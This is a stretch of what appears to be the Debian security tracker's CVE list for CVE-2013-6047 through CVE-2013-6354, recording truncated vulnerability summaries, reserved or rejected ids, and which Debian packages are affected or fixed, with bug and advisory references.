CVE-2013-6354
	RESERVED
CVE-2013-6353
	RESERVED
CVE-2013-6352
	RESERVED
CVE-2013-6351
	RESERVED
CVE-2013-6350
	RESERVED
CVE-2013-6349 (McAfee Email Gateway (MEG) 7.0 before 7.0.4 and 7.5 before 7.5.1 allow ...)
	NOT-FOR-US: McAfee Email Gateway
CVE-2013-6348 (Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2 ...)
	- libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.3)
	NOTE: https://issues.apache.org/jira/browse/WW-4213
CVE-2013-6347 (Session fixation vulnerability in Novell ZENworks Configuration Manage ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-6346 (Cross-site request forgery (CSRF) vulnerability in the ZCC page in Nov ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-6345 (Unspecified vulnerability in the ZCC page in Novell ZENworks Configura ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-6344 (The ZCC page in Novell ZENworks Configuration Management (ZCM) before ...)
	NOT-FOR-US: Novell ZENworks Configuration Management
CVE-2013-6343 (Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT ...)
	NOT-FOR-US: ASUS Router
CVE-2013-6342 (Cross-site scripting (XSS) vulnerability in the Tweet Blender plugin b ...)
	NOT-FOR-US: Tweet Blender plugin for WP
CVE-2013-6341 (SQL injection vulnerability in Dokeos 2.2 RC2 and earlier allows remot ...)
	NOT-FOR-US: Dokeos
CVE-2013-6366 (The Groovy script console in VMware Hyperic HQ 4.6.6 allows remote aut ...)
	NOT-FOR-US: VMware Hyperic HQ
CVE-2013-6365 (Horde Groupware Web mail 5.1.2 has CSRF with requests to change permis ...)
	- php-horde 5.1.5+debian0-1 (bug #730110)
	- php-horde-kronolith 4.1.4-1 (bug #730980)
	- kronolith2 (Vulnerable code not present)
	- horde3
	[squeeze] - horde3 (Unsupported in squeeze-lts)
	NOTE: https://github.com/horde/horde/commit/b79114d08ee8c8e43e74a179741749529f6d885c
CVE-2013-6364 (Horde Groupware Webmail Edition has CSRF and XSS when saving search as ...)
	- php-horde (Vulnerable code in turba)
	- php-horde-turba 4.1.3-1 (bug #730979)
	- turba2
	[squeeze] - turba2 (Unsupported in squeeze-lts)
	NOTE: https://github.com/horde/horde/commit/74f9add4ad86c29b608270e33b17426163b3c8cf
CVE-2013-6340 (epan/dissectors/packet-tcp.c in the TCP dissector in Wireshark 1.8.x b ...)
	{DSA-2792-1}
	- wireshark 1.10.3-1
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9263
CVE-2013-6339 (The dissect_openwire_type function in epan/dissectors/packet-openwire. ...)
	{DLA-497-1}
	- wireshark 1.10.3-1 (unimportant)
	[squeeze] - wireshark (OpenWire dissector introduced in 1.8.0)
	NOTE: Not suitable for code injection
CVE-2013-6338 (The dissect_sip_common function in epan/dissectors/packet-sip.c in the ...)
	{DSA-2792-1}
	- wireshark 1.10.3-1
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9228
CVE-2013-6337 (Unspecified vulnerability in the NBAP dissector in Wireshark 1.8.x bef ...)
	{DSA-2792-1}
	- wireshark 1.10.3-1
	[squeeze] - wireshark (Vulnerable code not present)
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9168 not accessible
CVE-2013-6336 (The ieee802154_map_rec function in epan/dissectors/packet-ieee802154.c ...)
	{DSA-2792-1}
	- wireshark 1.10.3-1
	[squeeze] - wireshark (code introduced in 1.6.0)
	NOTE: http://anonsvn.wireshark.org/viewvc?view=revision&revision=52036
CVE-2013-6335 (The Backup-Archive client in IBM Tivoli Storage Manager (TSM) for Spac ...)
	NOT-FOR-US: IBM Tivoli Storage Manager
CVE-2013-6334 (IBM Atlas eDiscovery Process Management 6.0.1.5 and earlier and 6.0.2, ...)
	NOT-FOR-US: IBM
CVE-2013-6333 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6332 (Unrestricted file upload vulnerability in IBM Algo One UDS 4.7.0 throu ...)
	NOT-FOR-US: IBM Algo One UDS
CVE-2013-6331 (SQL injection vulnerability in IBM Algo One, as used in MetaData Manag ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6330 (IBM WebSphere Application Server 7.x before 7.0.0.31, when simpleFileS ...)
	NOT-FOR-US: IBM WebSphere
CVE-2013-6329 (IBM Global Security Kit (aka GSKit), as used in Content Manager OnDema ...)
	NOT-FOR-US: IBM Global Security Kit
CVE-2013-6328 (Cross-site scripting (XSS) vulnerability in the Web Content Manager (W ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6327 (Cross-site scripting (XSS) vulnerability in the HTTP Option in IBM Ste ...)
	NOT-FOR-US: IBM
CVE-2013-6326
	RESERVED
CVE-2013-6325 (IBM WebSphere Application Server 7.x before 7.0.0.31, 8.0.x before 8.0 ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-6324
	RESERVED
CVE-2013-6323 (Cross-site scripting (XSS) vulnerability in the Administration Console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-6322 (Cross-site scripting (XSS) vulnerability in Sterling Order Management ...)
	NOT-FOR-US: IBM Sterling Selling and Fulfillment Suite
CVE-2013-6321 (SQL injection vulnerability in IBM Atlas eDiscovery Process Management ...)
	NOT-FOR-US: IBM Atlas eDiscovery Process Management
CVE-2013-6320 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6319 (IBM Algo One, as used in MetaData Management Tools in UDS 4.7.0 throug ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6318 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6317
	RESERVED
CVE-2013-6316 (IBM WebSphere Portal 7.0.0.x before 7.0.0.2 CF26 and 8.0.0.x before 8. ...)
	NOT-FOR-US: IBM WebSphere Portal
CVE-2013-6315 (IBM InfoSphere Enterprise Records 4.5.1 before 4.5.1.7-IER-IF001 and E ...)
	NOT-FOR-US: IBM InfoSphere Enterprise Records
CVE-2013-6314 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Enterprise ...)
	NOT-FOR-US: IBM InfoSphere Enterprise Records
CVE-2013-6313
	RESERVED
CVE-2013-6312 (Unspecified vulnerability in IBM Rational Service Tester 8.3.x and 8.5 ...)
	NOT-FOR-US: IBM
CVE-2013-6311 (SQL injection vulnerability in IBM Marketing Platform 9.1 before FP2 a ...)
	NOT-FOR-US: IBM Marketing Platform
CVE-2013-6310 (Cross-site scripting (XSS) vulnerability in IBM Marketing Platform 9.1 ...)
	NOT-FOR-US: IBM Marketing Platform
CVE-2013-6309 (IBM Marketing Platform 9.1 before FP2 allows remote authenticated user ...)
	NOT-FOR-US: IBM Marketing Platform
CVE-2013-6308 (IBM Marketing Platform 9.1 before FP2 allows remote authenticated user ...)
	NOT-FOR-US: IBM Marketing Platform
CVE-2013-6307 (Cross-site scripting (XSS) vulnerability in IBM Security QRadar SIEM 7 ...)
	NOT-FOR-US: IBM Security QRadar SIEM
CVE-2013-6306 (Unspecified vulnerability on IBM Power 7 Systems 740 before 740.70 01A ...)
	NOT-FOR-US: IBM Power 7
CVE-2013-6305 (IBM Platform Symphony 5.2 before build 229037 and 6.1.0.1 before build ...)
	NOT-FOR-US: IBM Platform Symphony
CVE-2013-6304 (Multiple directory traversal vulnerabilities in Algo Risk Application ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6303 (Directory traversal vulnerability in IBM Algo One, as used in MetaData ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6302 (SQL injection vulnerability in IBM Algo One, as used in MetaData Manag ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6301 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6300 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6299 (Cross-site scripting (XSS) vulnerability in IBM Algo One, as used in M ...)
	NOT-FOR-US: IBM Algo One
CVE-2013-6298
	RESERVED
CVE-2013-6297
	RESERVED
CVE-2013-6296
	RESERVED
CVE-2013-6295 (PrestaShop 1.5.5 vulnerable to privilege escalation via a Salesman acc ...)
	NOT-FOR-US: PrestaShop
CVE-2013-6294
	RESERVED
CVE-2013-6293
	RESERVED
CVE-2013-6292
	RESERVED
CVE-2013-6291
	RESERVED
CVE-2013-6290
	RESERVED
CVE-2013-6287
	RESERVED
CVE-2013-6286
	RESERVED
CVE-2013-6284 (Unspecified vulnerability in the Statutory Reporting for Insurance (FS ...)
	NOT-FOR-US: Financial Services module for SAP ERP Central Component
CVE-2013-6283 (VideoLAN VLC Media Player 2.0.8 and earlier allows remote attackers to ...)
	- vlc 2.1.0-2 (unimportant)
	[squeeze] - vlc (Unsupported in squeeze-lts)
	NOTE: User-assisted DoS for X session (freezes window manager) in 2.0.3-5
CVE-2013-6282 (The (1) get_user and (2) put_user API functions in the Linux kernel be ...)
	- linux 3.6.4-1~experimental.1
	- linux-2.6 (Introduced in 2.6.38)
	[wheezy] - linux 3.2.53-1
	NOTE: https://www.codeaurora.org/projects/security-advisories/missing-access-checks-putusergetuser-kernel-api-cve-2013-6282
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/arch/arm/include/asm/uaccess.h?id=8404663f81d212918ff85f493649a7991209fa04
CVE-2013-6281 (Cross-site scripting (XSS) vulnerability in codebase/spreadsheet.php i ...)
	NOT-FOR-US: Wordpress plugin
CVE-2013-6280 (Cross-site scripting (XSS) vulnerability in Social Sharing Toolkit plu ...)
	NOT-FOR-US: Wordpress plugin
CVE-2013-6279
	RESERVED
CVE-2013-6278
	RESERVED
CVE-2013-6277 (QNAP VioCard 300 has hardcoded RSA private keys. ...)
	NOT-FOR-US: QNAP
CVE-2013-6276
	RESERVED
CVE-2013-6274
	RESERVED
CVE-2013-6273
	RESERVED
CVE-2013-6272 (The NotificationBroadcastReceiver class in the com.android.phone proce ...)
	NOT-FOR-US: Android
CVE-2013-6271 (Android 4.0 through 4.3 allows attackers to bypass intended access res ...)
	NOT-FOR-US: Android
CVE-2013-6270
	RESERVED
CVE-2013-6269
	RESERVED
CVE-2013-6268
	RESERVED
CVE-2013-6267 (Multiple cross-site scripting (XSS) vulnerabilities in Claroline befor ...)
	NOT-FOR-US: Claroline
CVE-2013-6266
	REJECTED
CVE-2013-6265
	REJECTED
CVE-2013-6264
	REJECTED
CVE-2013-6263
	REJECTED
CVE-2013-6262
	REJECTED
CVE-2013-6261
	REJECTED
CVE-2013-6260
	REJECTED
CVE-2013-6259
	REJECTED
CVE-2013-6258
	REJECTED
CVE-2013-6257
	REJECTED
CVE-2013-6256
	REJECTED
CVE-2013-6255
	REJECTED
CVE-2013-6254
	REJECTED
CVE-2013-6253
	REJECTED
CVE-2013-6252
	REJECTED
CVE-2013-6251
	REJECTED
CVE-2013-6250
	REJECTED
CVE-2013-6249
	REJECTED
CVE-2013-6248
	REJECTED
CVE-2013-6247
	REJECTED
CVE-2013-6246 (The Dell Quest One Password Manager, possibly 5.0, allows remote attac ...)
	NOT-FOR-US: Dell Quest One Password Manager
CVE-2013-6245 (Unspecified vulnerability in SAP Sybase Adaptive Server Enterprise (AS ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6244 (The Live Update webdynpro application (webdynpro/dispatcher/sap.com/tc ...)
	NOT-FOR-US: SAP NetWeaver
CVE-2013-6289 (Cross-site scripting (XSS) vulnerability in the Apache Solr for TYPO3 ...)
	NOT-FOR-US: TYPO3 extension Apache Solr
CVE-2013-6288 (Unspecified vulnerability in the Apache Solr for TYPO3 (solr) extensio ...)
	NOT-FOR-US: TYPO3 extension Apache Solr
CVE-2013-6285 (The search component in the Treasurer application in Tyler Technologie ...)
	NOT-FOR-US: Tyler Technologies TaxWeb
CVE-2013-6275 (Multiple CSRF issues in Horde Groupware Webmail Edition 5.1.2 and earl ...)
	- php-horde-ingo 3.1.3-1 (bug #727669)
	- ingo1 (Affected code not present)
CVE-2013-6242 (Cross-site scripting (XSS) vulnerability in the frontend in Open-Xchan ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-6241 (The Birthday widget in the backend in Open-Xchange (OX) AppSuite 7.2.x ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-6240
	RESERVED
CVE-2013-6239 (Cross-site scripting (XSS) vulnerability in the photo gallery model in ...)
	NOT-FOR-US: Exis Contexis
CVE-2013-6238
	RESERVED
CVE-2013-6237 (The ISL Desktop plugin for Windows before 1.4.7 for ISL Light 3.5.4 an ...)
	NOT-FOR-US: ISL Light
CVE-2013-6236 (IZON IP 2.0.2: hard-coded password vulnerability ...)
	NOT-FOR-US: Stem Innovations IZON
CVE-2013-6235 (Multiple cross-site scripting (XSS) vulnerabilities in JAMon (Java App ...)
	- libjamon-java (jamon.war/JAMon web apps gets excluded by debian/orig-tar.sh)
	NOTE: http://seclists.org/bugtraq/2014/Jan/92
CVE-2013-6234 (Unrestricted file upload vulnerability in the Worksheet designer in Sp ...)
	NOT-FOR-US: SpagoBI
CVE-2013-6233 (Cross-site scripting (XSS) vulnerability in SpagoBI before 4.1 allows ...)
	NOT-FOR-US: SpagoBI
CVE-2013-6232 (Cross-site scripting (XSS) vulnerability in SpagoBI before 4.1 allows ...)
	NOT-FOR-US: SpagoBI
CVE-2013-6231 (SpagoBI before 4.1 has Privilege Escalation via an error in the Adapte ...)
	NOT-FOR-US: SpagoBI
CVE-2013-6230 (The Winsock WSAIoctl API in Microsoft Windows Server 2008, as used in ...)
	- bind9 (Affects only Windows systems)
	NOTE: https://kb.isc.org/article/AA-01062
CVE-2013-6229 (Multiple cross-site scripting (XSS) vulnerabilities in Atmail Webmail ...)
	- atmailopen
CVE-2013-6228
	RESERVED
CVE-2013-6227 (Unrestricted file upload vulnerability in plugins/editor.zoho/agent/sa ...)
	NOT-FOR-US: Zoho plugin in Pydio (AjaXplorer)
CVE-2013-6226 (Directory traversal vulnerability in plugins/editor.zoho/agent/save_zo ...)
	NOT-FOR-US: Pydio (AjaXplorer) Zoho Editor plugin
CVE-2013-6225 (LiveZilla 5.0.1.4 has a Remote Code Execution vulnerability ...)
	NOT-FOR-US: LiveZilla
CVE-2013-6224 (Multiple cross-site scripting (XSS) vulnerabilities in LiveZilla befor ...)
	NOT-FOR-US: Livezilla
CVE-2013-6223 (LiveZilla before 5.1.1.0 stores the admin Base64 encoded username and ...)
	NOT-FOR-US: Livezilla
CVE-2013-6222 (Cross-site scripting (XSS) vulnerability in the Mobility Web Client an ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-6221 (Directory traversal vulnerability in CommunicationServlet in HP Servic ...)
	NOT-FOR-US: HP Service Virtualization
CVE-2013-6220 (Cross-site scripting (XSS) vulnerability in HP Network Node Manager i ...)
	NOT-FOR-US: HP
CVE-2013-6219 (Unspecified vulnerability in HP HP-UX Whitelisting (aka WLI) before A. ...)
	NOT-FOR-US: HP-UX
CVE-2013-6218 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x, 9. ...)
	NOT-FOR-US: HP
CVE-2013-6217
	REJECTED
CVE-2013-6216 (Unspecified vulnerability in HP Array Configuration Utility, Array Dia ...)
	NOT-FOR-US: HP
CVE-2013-6215 (Unspecified vulnerability in the Integration Service in HP Universal C ...)
	NOT-FOR-US: HP Universal Configuration Management Database Integration Service
CVE-2013-6214 (Unspecified vulnerability in the Integration Service in HP Universal C ...)
	NOT-FOR-US: HP
CVE-2013-6213 (Unspecified vulnerability in Virtual User Generator in HP LoadRunner b ...)
	NOT-FOR-US: HP
CVE-2013-6212 (Unspecified vulnerability in HP Database and Middleware Automation 10. ...)
	NOT-FOR-US: HP
CVE-2013-6211 (Unspecified vulnerability in HP StoreOnce Virtual Storage Appliance (V ...)
	NOT-FOR-US: HP StoreOnce
CVE-2013-6210 (Unspecified vulnerability in HP Unified Functional Testing before 12.0 ...)
	NOT-FOR-US: HP Unified Functional Testing
CVE-2013-6209 (Unspecified vulnerability in rpc.lockd in the NFS subsystem in HP HP-U ...)
	NOT-FOR-US: NFS subsystem in HP HP-UX
CVE-2013-6208 (Unspecified vulnerability in HP Smart Update Manager 5.3.5 before buil ...)
	NOT-FOR-US: HP Smart Update Manager
CVE-2013-6207 (Unspecified vulnerability in the loadFileContents function in the SOAP ...)
	NOT-FOR-US: HP SiteScope
CVE-2013-6206 (Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insigh ...)
	NOT-FOR-US: HP
CVE-2013-6205 (Unspecified vulnerability in HP Rapid Deployment Pack (RDP) and Insigh ...)
	NOT-FOR-US: HP
CVE-2013-6204 (The Web Console in HP Application Information Optimizer (formerly HP D ...)
	NOT-FOR-US: HP Application Information Optimizer
CVE-2013-6203 (The Web Console in HP Application Information Optimizer (formerly HP D ...)
	NOT-FOR-US: HP Application Information Optimizer
CVE-2013-6202 (Multiple cross-site request forgery (CSRF) vulnerabilities in HP Servi ...)
	NOT-FOR-US: HP Service Manager
CVE-2013-6201 (Unspecified vulnerability in HP Security Management System 3.3.0, 3.5. ...)
	NOT-FOR-US: HP Security Management System
CVE-2013-6200 (Unspecified vulnerability in m4 in HP HP-UX B.11.23 and B.11.31 allows ...)
	NOT-FOR-US: HP-UX
CVE-2013-6199
	REJECTED
CVE-2013-6198 (Cross-site scripting (XSS) vulnerability in HP Service Manager WebTier ...)
	NOT-FOR-US: HP Service Manager WebTier and Windows Client
CVE-2013-6197 (Unspecified vulnerability in HP Service Manager WebTier and Windows Cl ...)
	NOT-FOR-US: HP Service Manager WebTier and Windows Client
CVE-2013-6196 (Cross-site scripting (XSS) vulnerability in HP Autonomy Ultraseek 5 al ...)
	NOT-FOR-US: HP Autonomy Ultraseek
CVE-2013-6195 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: HP Data Protector
CVE-2013-6194 (Unspecified vulnerability in HP Storage Data Protector 6.2X allows rem ...)
	NOT-FOR-US: HP Data Protector
CVE-2013-6193 (Unspecified vulnerability on HP LaserJet M1522n and M2727; LaserJet Pr ...)
	NOT-FOR-US: HP Printers
CVE-2013-6192 (Cross-site request forgery (CSRF) vulnerability in HP Operations Orche ...)
	NOT-FOR-US: HP Operations Orchestration
CVE-2013-6191 (Cross-site scripting (XSS) vulnerability in HP Operations Orchestratio ...)
	NOT-FOR-US: HP Operations Orchestration
CVE-2013-6190
	REJECTED
CVE-2013-6189 (Unspecified vulnerability in the Archive Query Server in HP Applicatio ...)
	NOT-FOR-US: HP Application Information Optimizer
CVE-2013-6188 (Cross-site request forgery (CSRF) vulnerability in HP System Managemen ...)
	NOT-FOR-US: HP System Management Homepage
CVE-2013-6187
	REJECTED
CVE-2013-6186
	REJECTED
CVE-2013-6185
	REJECTED
CVE-2013-6184
	REJECTED
CVE-2013-6183
	REJECTED
CVE-2013-6182 (Unquoted Windows search path vulnerability in EMC Replication Manager ...)
	NOT-FOR-US: EMC Replication Manager
CVE-2013-6181 (EMC Watch4Net before 6.3 stores cleartext polled-device passwords in t ...)
	NOT-FOR-US: EMC Watch4net
CVE-2013-6180 (EMC RSA Security Analytics (SA) 10.x before 10.3, and RSA NetWitness N ...)
	NOT-FOR-US: RSA Security Analytics
CVE-2013-6179
	REJECTED
CVE-2013-6178 (Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer ...)
	NOT-FOR-US: EMC RSA Archer GRC
CVE-2013-6177 (Directory traversal vulnerability in EMC Document Sciences xPression 4 ...)
	NOT-FOR-US: EMC
CVE-2013-6176 (Multiple SQL injection vulnerabilities in EMC Document Sciences xPress ...)
	NOT-FOR-US: EMC
CVE-2013-6175 (Multiple cross-site scripting (XSS) vulnerabilities in EMC Document Sc ...)
	NOT-FOR-US: EMC
CVE-2013-6174 (Multiple open redirect vulnerabilities in xAdmin in EMC Document Scien ...)
	NOT-FOR-US: EMC
CVE-2013-6173 (Multiple cross-site request forgery (CSRF) vulnerabilities in EMC Docu ...)
	NOT-FOR-US: EMC
CVE-2013-6172 (steps/utils/save_pref.inc in Roundcube webmail before 0.8.7 and 0.9.x ...)
	{DSA-2787-1}
	- roundcube 0.9.4-1.1 (bug #727668)
	[squeeze] - roundcube (Vulnerable code not present)
	NOTE: http://web.archive.org/web/20160304042345/http://roundcube.net/news/2013/10/21/security-updates-095-and-087/
	NOTE: http://trac.roundcube.net/ticket/1489382
CVE-2013-6171 (checkpassword-reply in Dovecot before 2.2.7 performs setuid operations ...)
	- dovecot 1:2.2.9-1 (low; bug #729063)
	[wheezy] - dovecot (Minor issue)
	[squeeze] - dovecot (Minor issue)
CVE-2013-6170 (Juniper Junos 10.0 before 10.0S28, 10.4 before 10.4R7, 11.1 before 11. ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6169 (The TLS driver in ejabberd before 2.1.12 supports (1) SSLv2 and (2) we ...)
	{DSA-2775-1}
	- ejabberd 2.1.11-1 (bug #722105)
CVE-2013-6168 (Cross-site scripting (XSS) vulnerability in Zikula Application Framewo ...)
	NOT-FOR-US: Zikula
CVE-2013-6165
	RESERVED
CVE-2013-6164 (SQL injection vulnerability in view/objectDetail.php in Project'Or RIA ...)
	NOT-FOR-US: Project'Or RIA
CVE-2013-6163 (Multiple cross-site scripting (XSS) vulnerabilities in ProjeQtOr (form ...)
	NOT-FOR-US: Project'Or RIA
CVE-2013-6162 (Cross-site scripting (XSS) vulnerability in Code-Crafters Ability Mail ...)
	NOT-FOR-US: Code-Crafters Ability Mail Server
CVE-2013-6161
	REJECTED
CVE-2013-6160
	REJECTED
CVE-2013-6159
	REJECTED
CVE-2013-6158
	REJECTED
CVE-2013-6157
	REJECTED
CVE-2013-6156
	REJECTED
CVE-2013-6155
	REJECTED
CVE-2013-6154
	REJECTED
CVE-2013-6153
	REJECTED
CVE-2013-6152
	REJECTED
CVE-2013-6151
	REJECTED
CVE-2013-6150
	REJECTED
CVE-2013-6149
	REJECTED
CVE-2013-6148
	REJECTED
CVE-2013-6147
	REJECTED
CVE-2013-6146
	REJECTED
CVE-2013-6145
	REJECTED
CVE-2013-6144
	REJECTED
CVE-2013-6143 (The Schneider Electric Telvent SAGE 3030 RTU with firmware C3413-500-0 ...)
	NOT-FOR-US: Schneider Electric Telvent SAGE 3030 RTU
CVE-2013-6142 (DNP3Driver.exe in the DNP3 driver in Schneider Electric ClearSCADA 201 ...)
	NOT-FOR-US: Schneider Electric ClearSCADA
CVE-2013-6141 (Unspecified vulnerability in op5 Monitor before 6.1.3 allows attackers ...)
	NOT-FOR-US: op5
CVE-2013-6140
	RESERVED
CVE-2013-6139
	RESERVED
CVE-2013-6138
	RESERVED
CVE-2013-6137
	RESERVED
CVE-2013-6136
	RESERVED
CVE-2013-6135
	RESERVED
CVE-2013-6134
	RESERVED
CVE-2013-6133
	RESERVED
CVE-2013-6132
	RESERVED
CVE-2013-6131
	RESERVED
CVE-2013-6130
	RESERVED
CVE-2013-6128 (The KCHARTXYLib.KChartXY ActiveX control in KChartXY.ocx before 65.30. ...)
	NOT-FOR-US: WellinTech KingView
CVE-2013-6127 (The SUPERGRIDLib.SuperGrid ActiveX control in SuperGrid.ocx before 65. ...)
	NOT-FOR-US: WellinTech KingView
CVE-2013-6126
	REJECTED
CVE-2013-6125
	REJECTED
CVE-2013-6124 (The Qualcomm Innovation Center (QuIC) init scripts in Code Aurora Foru ...)
	NOT-FOR-US: Qualcomm (Android)
CVE-2013-6123 (Multiple array index errors in drivers/media/video/msm/server/msm_cam_ ...)
	NOT-FOR-US: Android Linux kernel
CVE-2013-6122 (goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux ker ...)
	NOT-FOR-US: Goodix gt915 Android touchscreen driver
CVE-2013-6121
	RESERVED
CVE-2013-6120
	RESERVED
CVE-2013-6119
	RESERVED
CVE-2013-6118
	RESERVED
CVE-2013-6117 (Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to byp ...)
	NOT-FOR-US: Dahua DVR
CVE-2013-6116
	RESERVED
CVE-2013-6115
	RESERVED
CVE-2013-6114 (Integer overflow in the OZDocument::parseElement function in Apple Mot ...)
	NOT-FOR-US: Apple Motion
CVE-2013-6113
	RESERVED
CVE-2013-6112
	RESERVED
CVE-2013-6111 (Cross-site scripting (XSS) vulnerability in the mod_pagespeed module 0 ...)
	NOT-FOR-US: mod_pagespeed
CVE-2013-6110
	RESERVED
CVE-2013-6109
	RESERVED
CVE-2013-6108
	RESERVED
CVE-2013-6107
	RESERVED
CVE-2013-6106
	RESERVED
CVE-2013-6105
	RESERVED
CVE-2013-6104
	REJECTED
CVE-2013-6103
	REJECTED
CVE-2013-6102
	REJECTED
CVE-2013-6101
	REJECTED
CVE-2013-6100
	REJECTED
CVE-2013-6099
	REJECTED
CVE-2013-6098
	REJECTED
CVE-2013-6097
	REJECTED
CVE-2013-6096
	REJECTED
CVE-2013-6095
	REJECTED
CVE-2013-6094
	REJECTED
CVE-2013-6093
	REJECTED
CVE-2013-6092
	REJECTED
CVE-2013-6091
	REJECTED
CVE-2013-6090
	REJECTED
CVE-2013-6089
	REJECTED
CVE-2013-6088
	REJECTED
CVE-2013-6087
	REJECTED
CVE-2013-6086
	REJECTED
CVE-2013-6085
	REJECTED
CVE-2013-6084
	REJECTED
CVE-2013-6083
	REJECTED
CVE-2013-6082
	REJECTED
CVE-2013-6081
	REJECTED
CVE-2013-6080
	REJECTED
CVE-2013-6079 (Buffer overflow in MostGear Soft Easy LAN Folder Share 3.2.0.100 allow ...)
	NOT-FOR-US: MostGear Soft Easy LAN Folder Share
CVE-2013-6078 (The default configuration of EMC RSA BSAFE Toolkits and RSA Data Prote ...)
	NOT-FOR-US: EMC RSA
CVE-2013-6077 (Citrix XenDesktop 7.0, when upgraded from XenDesktop 5.x, does not pro ...)
	NOT-FOR-US: Citrix XenDesktop
CVE-2013-6076 (strongSwan 5.0.2 through 5.1.0 allows remote attackers to cause a deni ...)
	- strongswan 5.1.0-3
	[squeeze] - strongswan (Vulnerable Code not present, introduced by upstream commit 30216000d3752026127c2f91470ce165ab3d3926)
	[wheezy] - strongswan (Vulnerable Code not present, introduced by upstream commit 30216000d3752026127c2f91470ce165ab3d3926)
CVE-2013-6075 (The compare_dn function in utils/identification.c in strongSwan 4.3.3 ...)
	{DSA-2789-1}
	- strongswan 5.1.0-3
CVE-2013-6074 (Cross-site scripting (XSS) vulnerability in Open-Xchange (OX) AppSuite ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-6073
	RESERVED
CVE-2013-6072
	RESERVED
CVE-2013-6071
	RESERVED
CVE-2013-6070
	RESERVED
CVE-2013-6069
	RESERVED
CVE-2013-6068
	RESERVED
CVE-2013-6067
	RESERVED
CVE-2013-6066
	RESERVED
CVE-2013-6065
	RESERVED
CVE-2013-6064
	RESERVED
CVE-2013-6243 (SQL injection vulnerability in the Landing Pages plugin 1.2.3, before ...)
	NOT-FOR-US: WordPress Landing Pages Plugin
CVE-2013-6167 (Mozilla Firefox through 27 sends HTTP Cookie headers without first val ...)
	- iceweasel (unimportant)
	NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=858215
CVE-2013-6166 (Google Chrome before 29 sends HTTP Cookie headers without first valida ...)
	- chromium-browser 31.0.1650.57-1 (low)
	[squeeze] - chromium-browser
	NOTE: https://code.google.com/p/chromium/issues/detail?id=238041
CVE-2013-6129 (The install/upgrade.php scripts in vBulletin 4.1 and 5 allow remote at ...)
	NOT-FOR-US: VBulletin
CVE-2013-6063
	RESERVED
CVE-2013-6062
	RESERVED
CVE-2013-6061
	RESERVED
CVE-2013-6060
	RESERVED
CVE-2013-6059
	RESERVED
CVE-2013-6058 (SQL injection vulnerability in appRain CMF 3.0.2 and earlier allows re ...)
	NOT-FOR-US: appRain CMS
CVE-2013-6057
	RESERVED
CVE-2013-6056 (OSSIM before 4.3.3.1 has tele_compress.php path traversal vulnerabilit ...)
	NOT-FOR-US: AlienVault OSSIM
CVE-2013-6055
	REJECTED
CVE-2013-6054 (Heap-based buffer overflow in OpenJPEG 1.3 has unspecified impact and ...)
	{DSA-2808-1}
	- openjpeg 1.3+dfsg-4.7 (bug #731237)
CVE-2013-6053 (OpenJPEG 1.5.1 allows remote attackers to obtain sensitive information ...)
	- openjpeg 1.5.2-1 (bug #731237)
	[wheezy] - openjpeg (Only affects 1.5)
	[squeeze] - openjpeg (Only affects 1.5)
CVE-2013-6052 (OpenJPEG 1.3 and earlier allows remote attackers to obtain sensitive i ...)
	{DSA-2808-1}
	- openjpeg 1.3+dfsg-4.7 (bug #731237)
CVE-2013-6051 (The bgp_attr_unknown function in bgp_attr.c in Quagga 0.99.21 does not ...)
	{DSA-2803-1}
	- quagga 0.99.22.4-1 (bug #730513)
	[squeeze] - quagga (Only affects 0.99.21)
CVE-2013-6050 (Integer overflow in Links before 2.8 allows remote attackers to cause ...)
	{DSA-2807-1}
	- links2 2.8-1
CVE-2013-6049 (apt-listbugs before 0.1.10 creates temporary files insecurely, which a ...)
	- apt-listbugs 0.1.10 (low)
	[squeeze] - apt-listbugs (Minor issue)
	[wheezy] - apt-listbugs 0.1.8+deb7u1
CVE-2013-6048 (The get_group_tree function in lib/Munin/Master/HTMLConfig.pm in Munin ...)
	{DSA-2815-1 DLA-20-1}
	- munin 2.0.18-1
	[squeeze] - munin 1.4.5-3+deb6u1
CVE-2013-6047 (Multiple cross-site scripting (XSS) vulnerabilities in the site creati ...)
